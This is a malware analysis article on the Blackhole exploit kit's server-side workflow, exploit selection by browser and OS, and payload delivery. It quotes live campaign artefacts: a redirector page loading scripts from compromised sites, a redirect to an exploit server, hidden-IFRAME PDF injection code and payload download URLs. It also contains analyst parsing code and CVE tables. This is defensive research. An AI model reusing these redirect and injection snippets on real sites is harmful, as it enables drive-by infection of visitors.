Part 2: Interaction with a black hole

2012-12-03

Gabor Szappanos

Sophos, Hungary
Editor: Helen Martin

Abstract

Gabor Szappanos started with two fairly incomplete sources of information about the latest Blackhole server version: the server-side source code from old versions and the outgoing flow of malware. He describes how, using these sources, he was able to sketch a reasonably good picture of what goes on inside the server hosting the Blackhole exploit kit.


Clearly, I should return my university diploma in Physics after coming up with a title like this. You cannot interact with a black hole by definition. The data flow is one-sided: everything goes in, nothing comes out – which hardly qualifies as an interaction. However, this is not the case with the Blackhole exploit kit, where information flows both in and out. Yet researching the latest Blackhole server version does remind me of examining a black hole: we have no information about what goes on inside, and we can only draw conclusions based on the effects it has on its surroundings. However, every analogy breaks at some point: we can observe the malware specimens that are coming out of Blackhole – there is a definite outward flow of information.

We can also take the knowledge gathered from analysing the old Blackhole server-side code, and see how useful it is when taking apart the attacks performed with this kit.

Essentially, we have two fairly incomplete sources of information: the outdated server-side source code and the outgoing flow of malware. From these two we can sketch a reasonably good picture of what is going on inside the server hosting the Blackhole exploit kit.

We will find that even though the code in question is quite a few versions behind the current code, the overall operation has not changed much.

Attack in detail

The first part of this two-part series [1] ended with the deobfuscation of the server code, which was not complete, but sufficient for a general understanding of its operation. It proved to be possible to follow the chain of events both from the client side and the server side. The client-side events had already been documented in detail [2], while the server-side part was the missing piece that this article attempts to fill.

Data about the Blackhole attacks was gathered during a relatively long period from October 2011 until September 2012, which gave an insight into the moving parts and those that remained constant.

Typically, the initial vector of attack was spammed email messages. The email either came with an attached script that redirected to the Blackhole server or contained a direct link to the server – or, in its most simplistic form, the payload executable was sent out directly with the message.

Another known vector of Blackhole distribution was the injection of downloader code into websites. This method resulted in a very similar sequence of events, with only the initial vector differing.

Chain of events

Throughout the rest of the article I will refer to the most important server-side components as they are referred to in the configuration file (config.php). These are:

  • mainfile: As the first point of contact with the server, this PHP page receives the incoming requests from the targeted computers. Upon receiving a request, this page prepares (based on information gathered from the incoming request) a custom tailored downloader script that exploits the vulnerabilities identified on the target computer.

  • downloadfile: The individual exploits handed out by the mainfile connect back to this PHP page. Upon receiving a request, this page hands out the binary payload to the target computer.

A typical attack line consists of four distinct phases:

  1. Initial vector: The targeted host is provided with a carrier; this offers a hyperlink to initiate a chain of events that concludes in the Blackhole infection.

  2. Redirections: The initial vector from the previous stage is redirected through intermediate sites to make tracing the attack more complicated.

  3. mainfile: The hosting server is contacted and the server code collects and distributes the exploit functions for the targeted host.

  4. downloadfile: After any of the served exploits from the previous phase is activated, its downloader code connects back and the server code distributes the binary (Win32) executable payload.

A real example of the above scheme is shown in Figure 1.

Figure 1. Real-life example.

Throughout the rest of the paper, I will not go into great depth on the working of the individual components if I feel that the particular component is already well documented [2].

Initial vector

All the fun starts with an official-seeming email, as illustrated in Figure 2.

Figure 2. Typical official-looking email message.

It is interesting that in all of the identified email attacks the criminals used emails that looked like official notifications from an authority (e.g. BBB, IRS, UPS, Amazon, EFTPS), rather than the Viagra/‘naked teen girls’/‘Britney Spears exposed’ themes that appeal to more basic instincts and are commonly observed in other malware distribution campaigns. The HTML messages contained a link that led to the next stage. In some rare cases the entire redirections stage was skipped, and the email itself contained a direct link or a JavaScript-obfuscated link to mainfile.

The other common intrusion vector for the Blackhole attacks was web infection: HTML or JS files on web servers were injected with downloader code. The infection reportedly occurred [5] using stolen FTP credentials to access the websites.

The JavaScript code in Figure 3 is stored in a byte array, in which the original values are modified by an encryption key. This key is generated from the seconds value of Date(2010,11,3,2,21,4). This is an interesting date, which keeps recurring in Blackhole components: it was used in the server code, and it keeps appearing in the web infection code as well.

Figure 3. Blackhole web infection component.

Redirections

The redirections stage consisted of intermediate encrypted JavaScript files. Typically, there were a few dozen to a few hundred HTML pages to begin with. These are usually hosted on hacked legitimate websites, and the URL pattern is recognizable within a campaign. Most often it takes the form of hxxp://[legitimatedomain]/VHuzAprT/index.html, with a legitimate domain, a random directory and index.html. The other common scheme used hacked WordPress sites, with the HTML redirector page placed in one of the default directories – for example: hxxp://stoprocking.com/wp-content/themes/twentyten/palco.html. In the latter case the HTML filename stays the same within a campaign but changes between distribution runs; it looks normal, but is not as commonly used a name as index.html.

These HTML pages are simple, and without any obfuscation just link to the next step, the JavaScript part:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hxxp://www.grapevalleytours.com.au/ajaxam.js"></script>;
<script language="JavaScript" type="text/JavaScript" src="hxxp://www.womenetcetera.com/ajaxam.js"></script>;
<script language="JavaScript" type="text/JavaScript" src="hxxp://levillagesaintpaul.com/ccounter.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://fasttrialpayments.com/kquery.js"></script>
</html>

Typically, there are between three and five different JavaScript links, all of which serve the same, even simpler content:

document.location='hxxp://downloaddatafast.serveftp.com/main.php?page=db3408bf080473cf';

This stage is the most flexible part – sometimes the HTML part is missing, sometimes the JavaScript part, and rarely both of them (when the initial spammed email messages contain a direct link to the server).

At the end of the chain there is the mainfile link, which is the first encounter with the Blackhole hosting server. The link has an easy-to-recognize structure:

http://{server}/{mainfile}?{threadid}={random hex digits}

The above scheme was followed in all of the cases we observed.

{server} denotes the server hosting the Blackhole kit; {mainfile} is the name of the main exploit dispatcher script, which returns the downloader script with the exploits; {threadid} is an identifier meant to distinguish distribution campaigns. Its value changed over time, although in the short term it could persist for a while, with only the hosting server names changing daily. One particular thread ID, 73a07bcb51f4be71, was very enduring, appearing several times in the period between 31/01/2012 and 03/04/2012.
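The link structure described above can be recognized mechanically. The following is a minimal Python sketch, not part of the kit or of any published tool: the function name and the returned field names are hypothetical, and the check simply assumes a single query parameter whose value consists of hexadecimal digits, as in the sample link shown earlier.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The value after '=' is assumed to consist only of hexadecimal digits.
HEX_VALUE = re.compile(r"^[0-9a-fA-F]+$")


def parse_mainfile_url(url):
    """Split a (possibly defanged) mainfile link into its components.

    Returns None when the link does not have exactly one query
    parameter with a hexadecimal value.
    """
    # Undo the hxxp:// defanging used in this article.
    if url.lower().startswith("hxxp"):
        url = "http" + url[4:]
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    if len(query) != 1:
        return None
    name, value = query[0]
    if not HEX_VALUE.match(value):
        return None
    return {
        "server": parts.netloc,
        "mainfile": parts.path.lstrip("/"),
        "param_name": name,   # hypothetical field name
        "hex_value": value,   # hypothetical field name
    }
```

Applied to the document.location link from the redirector sample, this yields the server downloaddatafast.serveftp.com, the mainfile main.php and the hexadecimal value db3408bf080473cf. A match on this shape alone is only a hint, since many legitimate URLs look similar.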

This thread ID was supposed to be the cornerstone of the Blackhole TDS (traffic direction system) functionality. It identified a set of possible configurations, distinguishing between the distribution campaigns. For each configuration set, different rules (regarding the distributed exploit) could be defined, determined by the value of the BrowserID, CountryID and OSID information gathered from the incoming request.

So in theory, Blackhole could serve custom tailored exploits for the attacked computers. In practice, however, the 1.0.2 configuration contained a single rule that served all distribution campaigns and OS/browser/country combinations. Despite the fact that a fully fledged TDS functionality was available, and that the particular code base was supposed to support 28 different server installations simultaneously, it was not utilized.

However, the situation has changed significantly in the latest identified installation. Mapping the actual state in September 2012 (version 1.2.5 of the kit), probing with different OS and browser versions, we observed a very granular TDS functionality, which is summarized in Table 1a and Table 1b.

| Exploit delivered | Vista: IE7, IE8; Win7: IE9, IE10 | Win7: Mozilla22, Opera12, Safari5; Android: Safari5 | Win7: Firefox14 | Vista: IE6 | Non-Windows platforms | WinNT90: IE9 | Win8: Chrome17 |
|---|---|---|---|---|---|---|---|
| Java (CVE-2010-0840, CVE-2012-0507) | + | + | + | + | - | + | + |
| XMLHTTP+ADODBSTREAM downloader (MS06-014) | - | - | - | + | - | - | - |
| (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 | + (IFRAME) | + (object) | + (object + IFRAME) | + (IFRAME) | - | + (IFRAME) | + (object) |
| HCP (CVE-2010-1885) XMLHTTP+ADODB | - | - | - | - | - | - | - |
| Flash (CVE-2011-0611) | - | - | - | - | + | + | + |
| Flash (CVE-2011-2110) | + | + | + | + | + | + | + |
| CVE-2012-1889 | - | - | - | - | - | - | - |

Table 1a. Exploit distribution table in relation to OS/browser version info.

| Exploit delivered | OSX: IE5; WinCE: IE4 | Win2K: Firefox5 | WinXP: IE9 | WinXP: Chrome17 | Win95: IE4; Win98: IE4, IE5, IE6; WinNT: IE5; WinNT351: IE5; WinNT40: IE5; Win2K: IE4, IE5, IE6 | Win2K3: IE7 | Win2K: IE8; WinXP: AOL96 |
|---|---|---|---|---|---|---|---|
| Java (CVE-2010-0840, CVE-2012-0507) | - | + | + | + | + | + | + |
| XMLHTTP+ADODBSTREAM downloader (MS06-014) | + | - | - | - | + | - | - |
| (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 | - | + (object + IFRAME) | + (IFRAME) | + (object) | + (IFRAME) | + (IFRAME) | + (object) |
| HCP (CVE-2010-1885) XMLHTTP+ADODB | - | - | + (link) | + (link) | - | + (embed) | + (embed) |
| Flash (CVE-2011-0611) | + | + | + | + | + | + | + |
| Flash (CVE-2011-2110) | + | + | + | + | + | + | + |
| CVE-2012-1889 | - | - | - | - | - | - | - |

Table 1b. Exploit distribution table in relation to OS/browser version info.

Mainfile

Upon receiving the incoming request, the ‘RedirectsSplit’ value in threaddata.php determines the type of reaction required. If it has some predefined value(s), it simply redirects the incoming request to the configured URL(s). If the value is not set, the exploit kit goes on to build the mainfile response, which will be a collection of functions, each of them exploiting a particular vulnerability.

Both the redirect and the attack response are logged in the MySQL database along with the IP address of the requesting victim.

The mainfile response is gathered from predefined building blocks. It consists of the JavaScript-enabled exploit functions, a general Java downloader that works without JavaScript support, and an end_redirect() finishing function. Finally, the returned script is encrypted.

The build logic is roughly the following:

insert = "end_redirect{};PluginDetect(){…};"
if exploit_1 is selected {
  insert += "exploit1() {exploit1_code; call exploit2()}"
}
else {
  insert += "exploit1() { call exploit2()}"
}
if exploit_2 is selected {
  insert += "exploit2() {exploit2_code; call exploit3()}"
}
else {
  insert += "exploit2() { call exploit3()}"
}
…
insert += "call end_redirect{}; call exploit1()"
write NO_JS_html + JS_crypt(insert)
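The chaining idea in this build logic can be modelled in a few lines of Python. This is only an illustrative sketch under stated assumptions: build_chain, its parameters and the placeholder bodies are hypothetical, the spl naming follows the 1.2.x convention, the last stub is assumed to hand over to end_redirect(), and the PluginDetect block, the NO_JS part and the final encryption step are left out.

```python
def build_chain(selected, bodies, count):
    """Return JavaScript-like text for a chain of `count` exploit stubs.

    selected: set of stub indices whose exploit body is included
    bodies:   dict mapping index -> placeholder body text (hypothetical)
    """
    parts = ["function end_redirect(){}"]
    for i in range(count):
        # Every stub calls the next one; the last calls end_redirect()
        # (an assumption of this sketch).
        nxt = f"spl{i + 1}()" if i + 1 < count else "end_redirect()"
        # A deselected exploit leaves a blank stub that only forwards the call.
        body = bodies[i] + ";" if i in selected else ""
        parts.append(f"function spl{i}(){{{body}{nxt}}}")
    parts.append("spl0()")  # kick off the chain
    return ";".join(parts)
```

For example, build_chain({1}, {1: "/*exploit code*/"}, 3) produces three stubs in which only spl1 carries a body, while spl0 and spl2 merely pass control along. This mirrors how a deselected exploit still leaves a blank function in the generated script.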

The exploit functions in all 1.2.x kit versions are named spl0 through spl7. In the recently recorded attacks exploit function 0 was turned off, and exploit function 1 was absent from the building logic.

The infection script begins with the PluginDetect public library code [3], which is used to extract the relevant version information:

  • OS

  • Browser (and browser version)

  • Adobe Flash version

  • Adobe Reader version

  • Java version

This library is available for download, and in addition to the above list used by the Blackhole kit, other plug-ins are supported:

  • QuickTime

  • DevalVR

  • Shockwave

  • Windows Media Player

  • Silverlight

  • VLC Player

  • RealPlayer

The user-friendly download interface builds the script based on the specified settings regarding which of the plug-in versions should be included. It is not only Blackhole that has discovered this useful utility: the Bleeding Life exploit kit has used it, and recently the NeoSploit pack also added it [6] to its arsenal.

Blackhole has been using this library since at least version 1.0.2 – back then, it was only used in the PDF-related exploit function. Later versions, starting with 1.1.0, moved the library to the front of the code, to enable it to be referenced globally by the other exploit functions as well.

The library code is inserted into the resulting script as a BASE64-encoded blob and unpacked on the fly when building the mainfile response page – which is an unusual practice. The most likely reason for this is that, this way, the author could avoid the pain of escaping all special characters in the PluginDetect code when using it as a string constant in the mainfile generation code. That would involve the error-prone process of going through about 10KB of script code, which would have to be repeated whenever the PluginDetect version or the included modules changed (which happened a couple of times over the lifetime of the Blackhole exploit kit [see Table 2]).

| Version | Release date | Exploit functions | PluginDetect |
|---|---|---|---|
| 2.0 | 09/2012 | - | 0.7.8 (AdobeReader) |
| 1.2.5 | 30/07/2012 | spl0, spl2, spl3, spl4, spl5, spl6, spl7; spl0, spl2, spl4, spl5, spl7 blank | 0.7.8 (Java, Flash, AdobeReader) |
| 1.2.4 | 11/07/2012 | spl0, spl2, spl3, spl4, spl5, spl6, spl7; spl0, spl2, spl7 blank, spl4 and spl5 sometimes blank | 0.7.8 (Java, Flash, AdobeReader) |
| 1.2.3 | 28/03/2012 | spl0, spl2, spl3, spl4, spl5; spl4 blank, spl0 sometimes blank | 0.7.6 (Flash, AdobeReader) |
| 1.2.2 | 26/02/2012 | spl0, spl2, spl3, spl4, spl5; spl4 blank, spl0 blank | 0.7.6 (Flash, AdobeReader) |
| 1.2.1 | 09/12/2011 | spl0, spl1, spl2, spl3, spl4, spl5; spl4 blank | No version (Java, Flash, AdobeReader) |
| 1.2.0 | 11/09/2011 | spl0, spl2, spl3, spl4, spl5, spl6, spl7; spl6 blank | No version (Java, Flash, AdobeReader) |
| 1.0.2 | 20/11/2010 | ewvf, zazo, ai, dsfgsdfh, asgsaf | No version (AdobeReader, used in the PDF handler) |

Table 2. Mainfile characteristics in versions.

The individual exploit functions are organized in a function call chain. If a particular exploit is selected, then the appropriate function contains the exploit code, otherwise only the call to the next exploit function is present. During the construction of the script, all rules from threaddata.php are enumerated and matched against the information gathered from the incoming HTTP request. Filters can be defined by OS version, browser ID and country ID. For each defined rule a different set of exploit functions can be returned, thus implementing the TDS functionality.
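The rule matching described above can be pictured with a small Python model. It is a sketch only: the real rules live in threaddata.php and their format is not reproduced here, so the Rule class, its field names, the 'None matches anything' convention and the first-match behaviour are all assumptions made for illustration. The example exploit sets are likewise illustrative.

```python
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class Rule:
    """One hypothetical rule; None in a filter field means 'match anything'."""
    exploits: FrozenSet[str]
    os_id: Optional[str] = None
    browser_id: Optional[str] = None
    country_id: Optional[str] = None

    def matches(self, os_id, browser_id, country_id):
        return (self.os_id in (None, os_id)
                and self.browser_id in (None, browser_id)
                and self.country_id in (None, country_id))


def select_exploits(rules, os_id, browser_id, country_id):
    """Return the exploit set of the first matching rule (first-match is assumed)."""
    for rule in rules:
        if rule.matches(os_id, browser_id, country_id):
            return rule.exploits
    return frozenset()


# Illustrative rule list: one specific rule followed by a catch-all.
RULES = [
    Rule(frozenset({"spl2", "spl3", "spl6"}), os_id="Vista", browser_id="IE6"),
    Rule(frozenset({"spl3", "spl6"})),
]
```

A configuration with a single catch-all rule, as in the 1.0.2 installation, serves the same set to every visitor; adding more specific rules in front of it is what produces the granular behaviour observed later.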

Finally, an end_redirect function is called, which redirects the browser to an innocent page, with the usual ‘please wait…’ text. In some cases it additionally redirects to a Win32 executable.

At least the picture was this clear back with the 1.0.2 version. After the TDS functionality kicked in big time, and more granular system support was configured, the building logic got messy, most noticeably around the PDF exploit distribution, which in the 1.2.5 version already had three different forms.

The first form is applied when the browser is Internet Explorer. In this case, the exploiting PDF object is inserted as an IFRAME into the mainfile response script:

function show_pdf(src){var pifr=document.createElement('IFRAME');pifr.setAttribute('width',1);
pifr.setAttribute('height',1);pifr.setAttribute('src',src);document.body.appendChild(pifr)}

With some other browsers, such as Safari and Chrome, this form is changed to use an object element instead of an IFRAME:

function show_pdf(src){var p=document.createElement('object');p.setAttribute('type','application/pdf');
p.setAttribute('data',src);p.setAttribute('width',1);p.setAttribute('height',1);document.body.appendChild(p)}

In the case of Firefox, both forms are included at the same time:

function show_pdf(src){var pifr=document.createElement('IFRAME');pifr.setAttribute('width',1);
pifr.setAttribute('height',1);pifr.setAttribute('src',src);document.body.appendChild(pifr)}

function show_pdf2(src){var p=document.createElement('object');p.setAttribute('type','application/pdf');
p.setAttribute('data',src);p.setAttribute('width',1);p.setAttribute('height',1);document.body.appendChild(p)}

The HCP exploit (CVE-2010-1885) also has two forms: the first embeds the script code directly, while the other inserts an IFRAME with a link to the PHP file on the server providing the content.

The exploit function assemblage changed with Blackhole kit releases. Table 2 summarizes the mainfile characteristics of Blackhole exploit kit versions, exploit function information and the usage of the PluginDetect library. This information may help to identify the version of the underlying exploit kit in a given attack.
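As a rough illustration of such version identification, the Python sketch below compares the exploit function names found in a decrypted mainfile script against the function sets listed in the mainfile characteristics table. The function sets are copied from that table; everything else is an assumption, in particular the idea that the stubs appear as plain 'function splN(' declarations in the decrypted script. Blank-function patterns and the PluginDetect version, which the table also lists, are ignored here.

```python
import re

# Exploit function sets per kit version, copied from the
# mainfile characteristics table (blank/non-blank status is ignored).
FUNCTION_SETS = {
    "1.2.5": {0, 2, 3, 4, 5, 6, 7},
    "1.2.4": {0, 2, 3, 4, 5, 6, 7},
    "1.2.3": {0, 2, 3, 4, 5},
    "1.2.2": {0, 2, 3, 4, 5},
    "1.2.1": {0, 1, 2, 3, 4, 5},
    "1.2.0": {0, 2, 3, 4, 5, 6, 7},
}


def candidate_versions(script):
    """Return the kit versions whose function set equals the one in `script`."""
    # Assumed declaration syntax: 'function spl<digit>('.
    found = {int(n) for n in re.findall(r"function\s+spl(\d)\s*\(", script)}
    return sorted(v for v, funcs in FUNCTION_SETS.items() if funcs == found)
```

Because several releases share the same set of function names, the result is usually a short list of candidates rather than a single version; the remaining columns of the table would be needed to narrow it down further.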

It is worth noting that the call order of the exploit functions, their names, and in most cases the statically inserted function bodies are all hard-coded in the Blackhole server backend code, and thus cannot be changed easily. Indeed, there were only minor changes (resulting from the addition of new exploits to the kit) in the generated code; even the names of the exploit functions remained the same throughout versions 1.2.x.

There are two possible ways in which an exploit function is excluded from the mainfile script: the exploit function is missing completely, or it is a blank function, calling only the next one in the chain. The first can only be achieved by a new exploit kit release; the latter is possible via admin user interface clicks.

Each exploit function contains a connect-back URL that will be used to download and execute the Win32 binary content from the server. The URL has the following form:

http://{server}/{downloadfile}?f=73a07&e=1

Here, parameter f is the payload identifier, e is the exploit identifier.

(An interesting fact is that the PHP file serving the HCP vulnerability (CVE-2010-1885) connect-back URL reverses the order of the f and e parameters. It has no effect on the operation of the code, but is a remarkable deviation from the general pattern.)

As of version 1.2.5, the URL scheme for some of the attack vectors changed to serve multiple payloads instead of a single payload. The shellcode delivered by the Flash exploit can contain a list of file references, matching the above URL, but with a different file ID for each, as in the following example:

hxxp://spicyplaces.com/l/r.php?f=9235d&e=1
hxxp://spicyplaces.com/l/r.php?f=c5826&e=1
hxxp://spicyplaces.com/l/r.php?f=182b5&e=1

The variation of the HCP exploiting script with the code embedded into the mainfile response script can accept multiple parameters in the form: hxxp://spicyplaces.com/l/data/hcp_vbs.php?f=9235d::c5826::182b5&d=0::0::0. Both the file ID and the exploit ID can now serve multiple values. The variation that inserts only a link to the mainfile code also serves multiple payloads but in the old-fashioned way, serving them sequentially, one by one. This change was introduced in version 1.2.4, and only applied to the HCP function.
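Both the single-payload and the multi-payload URL forms shown above can be handled by one small parser. The Python sketch below is an analyst-side illustration, not kit code: the function name is hypothetical, and it simply assumes that multiple values are separated by '::' as in the hcp_vbs.php sample.

```python
from urllib.parse import urlsplit, parse_qs


def parse_connect_back(url):
    """Extract the f, e and d query parameters of a connect-back URL.

    Each parameter is returned as a list, so that the '::'-separated
    multi-payload form and the single-value form look the same to callers.
    """
    # Undo the hxxp:// defanging used in this article.
    if url.lower().startswith("hxxp"):
        url = "http" + url[4:]
    query = parse_qs(urlsplit(url).query)

    def values(name):
        raw = query.get(name, [""])[0]
        return raw.split("::") if raw else []

    return {"f": values("f"), "e": values("e"), "d": values("d")}
```

For the Flash sample links this returns a single file ID and the exploit ID 1; for the hcp_vbs.php sample it returns the three file IDs 9235d, c5826 and 182b5 together with three values for the d parameter.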

Table 3 identifies the mapping between the exploit ID (the e query parameter) and the delivered exploit content in the sample gathered at the beginning of the inspection period, the most recent field samples, and the original 1.0.2 code. (It was not possible to positively identify all cases, as samples were not always available, hence the question marks in the table.)

| Exploit ID | 1.2.0 (2011.11) | 1.2.5 (2012/09) | Server code (v.1.0.2) |
|---|---|---|---|
| 0 | Java (CVE-2010-4452) | Java (CVE-2010-0840, CVE-2012-0507) | XMLHTTP+ADODB (MS06-014) |
| 1 | - | SWF (CVE-2011-0611) | JAR (CVE-2010-0886) |
| 2 | JAR (CVE-2010-0886) | XMLHTTP+ADODB (MS06-014) | CVE-2010-1885 + XMLHTTP+ADODB |
| 3 | Java (?) | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) |
| 4 | XMLHTTP+ADODB (MS06-014) | PDF (CVE-2010-0188) | PDF (CVE-2010-0188) |
| 5 | HCP (CVE-2010-1885) | HCP (CVE-2010-1885) | CVE-2010-0806 |
| 6 | PDF (?) | ? | Java (CVE-2010-0840, CVE-2012-0507) |
| 7 | - | CVE-2012-1889 | - |
| 8 | SWF (CVE-2011-0611) | - | - |

Table 3. Exploit ID to exploit mappings.

Downloadfile

This stage of the attack is reached when the connect-back code from the activated exploit reaches back to the server, issuing a request with a specific format:

http://{server}/{downloadfile}?f=73a07&e=1

In the above URL the downloadfile variable is determined in config.php. The most common values we observed were d.php, w.php and q.php.

The parameter f is the unique ID in the SQL database: this identifies which file from the data directory should be returned. The returned payload is dependent only on the value of f, regardless of the value of parameter e. Normally, we would expect that as the attacks are updated with new executables (which change frequently to avoid detection by anti-virus software), this value would increase on the same site. This was indeed observed in the first couple of attacks, although they were hosted on different servers. This implies that the database was likely dumped and imported when transferring the backend. Later, a huge change was observed, from file ID 97 to ea498. From then on, file IDs were five-digit hexadecimal numbers that were reused within attacks. As an example, 182b5 was seen from 05/06/2012 until 10/09/2012.

The parameter e identifies the exploit that was completed in the download. It is stored in the database along with the IP address of the infected host. This information is later used for tracking the exploit statistics.

If for any reason the e parameter is missing, a default value (4 in the case of 1.0.2) is taken, which belongs to a PDF (CVE-2010-0188) exploit. And as we look at the mainfile code, we can see that when constructing the PDF exploit code corresponding to the value 4, the e parameter tag is not appended to the end of the connect-back URL, which makes this default assignment logical.

Upon receiving this request, the server code builds a response. That response will include an executable payload inserted as application/x-msdownload content type, the content of which is determined by the f parameter of the request.

The filename of the download is randomly selected from the list: 'readme', 'info', 'contacts', 'about' and 'calc' to make the download appear less suspicious. The extension is always '.exe'.
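The observable behaviour of this stage can be summarized in a small Python model, which may be handy when writing detection or replay tooling. It is only a sketch built from the description above: the function and field names are hypothetical, the default exploit ID of 4 is the 1.0.2 value, and no payload handling or database logging is modelled.

```python
import random
from urllib.parse import urlsplit, parse_qs

# Values taken from the description above.
DOWNLOAD_NAMES = ["readme", "info", "contacts", "about", "calc"]
DEFAULT_EXPLOIT_ID = "4"  # default in 1.0.2 when the e parameter is missing


def describe_download(url, rng=random):
    """Summarize how a downloadfile request would be answered.

    Returns the file ID, the exploit ID that would be logged, and the
    response attributes described in the article.
    """
    query = parse_qs(urlsplit(url).query)
    return {
        "file_id": query.get("f", [None])[0],
        "exploit_id": query.get("e", [DEFAULT_EXPLOIT_ID])[0],
        "content_type": "application/x-msdownload",
        "filename": rng.choice(DOWNLOAD_NAMES) + ".exe",
    }
```

Passing a seeded random.Random instance as rng makes the chosen filename reproducible, which is convenient in tests.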

Individual exploits

The author of the exploit kit has been busy over the past two years keeping his creation up to date. As new popular exploit code has become available, he has added it to the code base and eventually removed old and not so useful vulnerabilities.

Table 4a and Table 4b summarize the exploit content of each of the exploit functions for all contemporary Blackhole versions.

In the following sections we describe the individual exploit functions deployed by Blackhole. Only the latest samples were analysed in more detail; older versions can be tracked from Table 4a and Table 4b. If data for a particular exploit is missing, it is because I couldn’t find it in any of the analysed samples belonging to the particular version of the exploit kit.

| Exploit function | 1.1.0 | 1.2.0 | 1.2.1 | 1.2.2 |
|---|---|---|---|---|
| spl0 | Java (CVE-2010-0840) | Java (CVE-2010-4452) | Java (CVE-2010-4452) | N/A |
| spl1 | Java (CVE-2010-4452) | N/A | ExpJava (CVE-2010-0840) | N/A |
| spl2 | Java (CVE-2010-0886) | Java (CVE-2010-0886) - (new.avi -> exe download) | XMLHTTP + ADODBSTREAM downloader (MS06-014) | XMLHTTP + ADODBSTREAM downloader (MS06-014) |
| spl3 | Java (CVE-2010-3552) | Java (CVE-2010-3552) | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 |
| spl4 | N/A | XMLHTTP+ADODB (MS06-014) | N/A | N/A |
| spl5 | PDF (CVE-2010-0188) | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324) or CVE-2010-0188 | Flash (CVE-2011-0611) | Flash (CVE-2011-0611) |
| spl6 | HCP (CVE-2010-1885) | N/A | N/A | N/A |
| spl7 | N/A | N/A | N/A | N/A |
| NOJS | N/A | Java (CVE-2010-0840, CVE-2012-0507) | N/A | Java (CVE-2010-0840, CVE-2012-0507) |

Table 4a. Exploit delivery in different versions of the Blackhole kit.

| Exploit function | 1.2.3 | 1.2.4 | 1.2.5 |
|---|---|---|---|
| spl0 | Java (CVE-2010-4452) | N/A | N/A |
| spl1 | N/A | N/A | N/A |
| spl2 | XMLHTTP + ADODBSTREAM downloader (MS06-014) | N/A | XMLHTTP + ADODBSTREAM downloader (MS06-014) |
| spl3 | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 | PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188 |
| spl4 | N/A | HCP (CVE-2010-1885) XMLHTTP+ADODB | HCP (CVE-2010-1885) XMLHTTP+ADODB |
| spl5 | Flash (CVE-2011-0611) | Flash (CVE-2011-0611) | Flash (CVE-2011-0611) |
| spl6 | N/A | Flash (CVE-2011-2110) | Flash (CVE-2011-2110) |
| spl7 | N/A | N/A | CVE-2012-1889 |
| NOJS | Java (CVE-2010-0840, CVE-2012-0507) | Java (CVE-2010-0840, CVE-2012-0507) | Java (CVE-2010-0840, CVE-2012-0507) |

Table 4b. Exploit delivery in different versions of the Blackhole kit.

spl0: empty

This exploit function used to deliver Java exploits (CVE-2010-0840 or CVE-2010-4452) in early versions, but since version 1.2.4 it has not been used.

spl1: missing

This exploit function delivered the same Java exploits as spl0, though not the same ones at the same time. From version 1.2.2 onwards it has been completely absent from the scripts – not even an empty skeleton was left in the call chain.

spl2: MDAC exploit MS06-014

This exploit function used a version of the classic VBScript downloader method that was very popular among script downloaders some 10 years ago. The only improvement over those old-timers is the access to the shell object, which instead of the CreateObject method makes use of some exploitable ActiveX objects.

The XMLHTTP object is utilized to download the file and the ADODB.Stream to save it to a local file. Then the exploited object is used to run the saved executable, as shown in Figure 4.

Figure 4. MS06-014 downloader.

spl3: PDF

This exploit function delivers the PDF exploits. The PluginDetect library is used to determine the version of the AdobeReader plug-in, and depending on the version, one of two possible PDF file generator PHP functions is called: the first for Adobe Reader versions below major version 8, and the second for all 8.x versions and for 9.x versions where x<=3. The decision logic is shown in Figure 5.

Figure 5. PDF delivery decision logic.
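The version split described in the prose above can be restated as a short Python sketch. It follows only that prose description, not the actual script in Figure 5: the function name, the generator labels and the (major, minor) tuple representation of the plug-in version are all hypothetical.

```python
def choose_pdf_generator(reader_version):
    """Pick a PDF generator label for a detected Adobe Reader version.

    reader_version: (major, minor) tuple such as (9, 3), or None when
    no Adobe Reader plug-in was detected.
    """
    if reader_version is None:
        return None
    major, minor = reader_version
    if major < 8:
        return "pdf_multi"      # hypothetical label: the multi-exploit PDF
    if major == 8 or (major == 9 and minor <= 3):
        return "pdf_libtiff"    # hypothetical label: the CVE-2010-0188 PDF
    return None                 # newer versions: no PDF is served
```

Under these assumptions, a visitor with Reader 7.1 would be pointed at the first generator, one with Reader 9.3 at the second, and one with Reader 9.4 would receive no PDF at all.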

The show_pdf() function appends an additional HTML child element that contains the link to the PDF generator server-side PHP script. This appended element can either be an IFRAME or an object, depending on the OS and browser version (see Table 1a and Table 1b).

The first PDF is a compound in itself, serving four different exploits. Depending on the Adobe Reader version, the following exploit codes are delivered [2]:

  • All major versions 9 and for major version 8 until 8.12: CVE-2009-0927 (Collab.getIcon)

  • All major versions 6 and for major version 7 before 7.11: CVE-2007-5659 (Collab.collectEmailInfo)

  • Version 7.1: CVE-2008-2992 (util.printf)

  • Versions between 8.12 and 8.2 (boundaries not included): CVE-2009-4324 (media.newPlayer).

The second PDF delivers only one exploit, CVE-2010-0188 (libtiff). The obfuscation of both of the PDF types is the same; it is sufficient to examine only one of them, which will be CVE-2010-0188.

The main script code is stored as data and distributed along the various PDF fields (Author, Subject, Keyword, Creator, Producer), with the hex-encoded shellcode being separate in the Title field.

Figure 6. Encrypted main script is stored in PDF fields.

The encoded main body is decoded by a simple decode script stored in the PDF which results in a script that uses the common heap-spray technique and builds the shellcode from the content of the Title field of the PDF.

Figure 7. Heap spray and shellcode builder.

